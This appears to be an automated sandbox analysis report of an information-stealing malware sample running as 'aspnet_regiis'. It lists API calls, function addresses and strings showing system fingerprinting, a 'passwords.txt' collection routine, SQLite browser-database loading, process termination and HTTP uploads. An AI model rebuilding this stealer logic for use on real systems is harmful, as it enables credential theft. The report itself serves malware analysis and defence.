call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                              • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                              • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                              • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                              • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                              • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                              • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                              • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                              • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                              • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                              • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                              • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                              • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                              • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                              • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                            • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                              • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                              • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                              • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                              • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                              • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                              • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                              • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                              • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                              • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                              • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                              • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                              • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                              • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                              • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                              • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                              • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                              • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                              • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                              • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                              • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                              • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                              • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                              • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                              • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                              • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                              • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                              • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                              • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                              • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                              • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                              • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                              • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                              • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                              • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                              • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                              • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                              • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                              • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                              • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                              • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                              • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                              • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                              • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                              • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                              • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                              • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                              • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                              • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                              • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                              • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                              • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                              • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                              • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                              • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                              • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                              • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                              • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                              • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                              • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                              • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                              • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                              • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                              • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                              • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                              • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                              • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                            • API String ID: 3634126619-1014693891
                                                                                                                            • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                            • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                            • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                            • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                              • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                              • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                              • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                            • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                            • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                            • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                            • API String ID: 2819533921-2709115261
                                                                                                                            • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                            • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                            • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                            • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                              • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                              • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                              • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                              • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                            • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                            • API String ID: 2840494320-4129404369
                                                                                                                            • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                            • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                            • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                            • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                            • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                            • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                            • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                            • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                            • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                            • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                            • String ID: passwords.txt
                                                                                                                            • API String ID: 1956182324-347816968
                                                                                                                            • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                            • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                            • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                            • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

                                                                                                                            Control-flow Graph

                                                                                                                            [Figure: control-flow graph, first block 404b2e-404bf3; legend: Executed / Not Executed]
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
